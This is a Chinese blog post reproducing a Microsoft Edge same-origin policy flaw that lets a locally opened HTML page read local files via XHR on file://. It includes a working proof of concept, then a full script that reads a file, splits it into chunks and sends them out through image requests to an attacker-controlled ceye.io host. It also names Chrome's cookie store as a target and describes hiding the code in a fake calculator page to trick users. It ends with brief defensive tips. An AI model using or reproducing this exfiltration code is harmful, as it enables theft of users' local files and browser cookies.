美文网首页
Microsoft Edge同源策略不严导致任意文件读取测试

Microsoft Edge同源策略不严导致任意文件读取测试

作者: 云勺 | 来源:发表于2018-09-10 20:22 被阅读0次
edge.pngedge.png

漏洞介绍

近期看到文章介绍,称Microsoft Edge对SOP同源策略处理存在问题,可导致任意文件泄露。
SOP同源策略是比较常见的,简单来说,在访问A域名时,如果B域名站点存在JS动作通过XHR请求了A域名网站下资源,该动作会被同源策略拒绝,因为它们非同源。
同源的判定标准是一个三元组,任意一个不同则判定不同源:协议、主机名、端口号

在浏览器中,可以使用file://协议来读取文件,攻击者如果想要读取到访问者的本地文件,由于http和file协议不同,不同源的情况下并不能做到。
但是这个限制在特定场景下就不存在了,如果恶意页面是保存在本地的文件,通过浏览器打开html文件,URL中协议就是file://,此时如果页面中存在XHR请求file://协议,该请求是符合同源要求的,可能导致本地文件读取。

复现测试

0x01 准备工作

尝试读取的本地文件:

txt.pngtxt.png

poc代码:

<html>    
<head>     
</head>    
<body>        
<div id="result"></div>
</body>
<script>    
let resultDiv = document.getElementById("result");    
    let xhr= new XMLHttpRequest();       
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= ()=> {    
     if(xhr.readyState==4) {    
     resultDiv.innerText = xhr.responseText;    
     }    
    }    
    xhr.send();    
</script>      
</html>
0x02 非Microsoft Edge浏览器测试

Chrome浏览器:提示同源策略请求只支持http,data,chrome,chrome-extension,https协议


chrome.pngchrome.png

fireforx浏览器:提示同源策略进制读取,CORS只能是http协议


firefox.pngfirefox.png

ie11浏览器:提示拒绝访问


ie.pngie.png
0x03 Microsoft Edge浏览器测试

看到的文章中测试版本是Microsoft Edge 40.15063.0.0,这里测试使用的是比它更新的版本:

version.pngversion.png

测试结果是:没有触发错误拦截信息,能够直接获取到本地文件内容:

edge1.pngedge1.png

相关拓展

0x01 任意数据外带

在测试中是仅仅对一个txt文件内容进行了读取,并将内容展示在页面中。

还可以读取其他浏览器存储的一些cookie信息,如:
Chrome的cookie信息一般在

C:/Users/${user}/AppData/Local/Google/Chrome/User Data/Default/Cookies
cookie.pngcookie.png

攻击者如果想要通过恶意页面,将本地的数据带出,也是轻而易举的。比如,可以在js中创建img标签,发起http请求攻击者的服务器,并且携带读取到的文件内容。

如果文件内容过长,get请求的URL会超长,还能对文件内容进行分割、间隔多次传输;
如果文件内容不仅是文本文字,或是图片等,还能通过各种编码进行包装传输(如encodeURI):

let resultDiv = document.getElementById("result");
    let data = "";    
    let xhr= new XMLHttpRequest();    
    let limit = 1024
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= function () {    
        if(xhr.readyState==4) {    
            resultDiv.innerText = xhr.responseText;
            url =  "http://XXXXX.ceye.io/data/?data=";   
            // data = window.btoa(xhr.responseText);  
            data = encodeURI(xhr.responseText);  
            console.log(data.length)
            let st=setInterval(function(){
                img = document.createElement("img");
                if (data.length <= limit) {
                    if (data.length == 0) {
                        clearInterval(st)
                    }else {
                        img.src = url + data;
                        resultDiv.appendChild(img);
                        clearInterval(st)
                        console.log("A:"+data.length)
                    }
                } else {
                    temp = data.substr(0, limit);
                    data = data.substr(limit,data.length-1);
                    img.src = url + temp;
                    resultDiv.appendChild(img);
                    console.log("B:"+temp.length)
                } 
            },1000)
        }    
    }    
    xhr.send();
image.pngimage.png

攻击者接收的数据段之一:

image1.pngimage1.png
0x02 隐藏伪装

造成任意文件内容泄露的JS代码本体并不大,可以隐藏在其他正常的下载页面中,在用户疏于防范的情况下隐蔽地执行;
结合社会工程等手段,可以更轻易地进行攻击利用。
例如,当下载一个用于学习html的网页,作者建议使用Microsoft Edge进行打开,你很可能会听从作者建议就运行查看效果

dir.pngdir.png calc.pngcalc.png

当页面功能显示正常,是一个计算器的网页,警惕心就没有了。
当你可能还沉浸在玩耍它的计算功能和学习源码的过程中时,攻击者想要的你本地文件内容可能已经被偷偷传走了

res.pngres.png

防护建议

1、不要随意打开不能确定是否存在危害的文件,包括html文件(先看一遍源代码)
2、使用解决了该问题的更新版本的Microsoft Edge
3、使用Chrome或者Firefox等浏览器

相关文章

  • Microsoft Edge同源策略不严导致任意文件读取测试

    漏洞介绍 近期看到文章介绍,称Microsoft Edge对SOP同源策略处理存在问题,可导致任意文件泄露。SOP...

  • Elasticsearch任意文件读取漏洞

    1.漏洞描述:      Elasticsearch由于代码过滤不严,导致在特定目录下会造成任意文件读取,如:ht...

  • JS四种跨域方式

    1.JSONP script标签是不受同源策略限制的,它可以载入任意地方的javascript文件,而不要求同源 ...

  • 同源策略, 跨域, JSONP

    问答 什么是同源策略 同源策略是浏览器安全的基石, 规定了不同源的网站不能相互读取资源 同源定义相同协议相同主机相...

  • AJAX跨域简单请求和非简单请求

    首先我们要先知道什么是同源策略,跨域就是因为同源策略导致的 1.为什么要有同源策略 浏览器设置同源策略只是为了完全...

  • 同源策略,跨域,jsonp

    1. 什么是同源策略 同源策略是浏览器为安全性考虑实施的重要的安全策略。限制来自不同源的资源对当前的文档读取或设置...

  • 服务器安装linux系统教程

    一、linux镜像的刻录 1.首先打开电脑上面任意浏览器(IE、Microsoft Edge、chrome、Fir...

  • 同源策略产生和如何跨域请求

    浏览器同源策略 含义 所谓同源策略,指的是浏览器对不同源的脚本或者文本的访问方式进行的限制。比如源a的js不能读取...

  • jsonp的跨域原理

    跨域初步 因为ajax受到同源策略的限制,不能跨域读取数据。 但有些属性不受同源策略影响,比如script标签的s...

  • 新版edge浏览器设置中文

    新版的edge是那个用Chromium内核的Microsoft Edge,微软面向公众开放了Microsoft E...

网友评论

      本文标题:Microsoft Edge同源策略不严导致任意文件读取测试

      本文链接:https://www.haomeiwen.com/subject/rpjegftx.html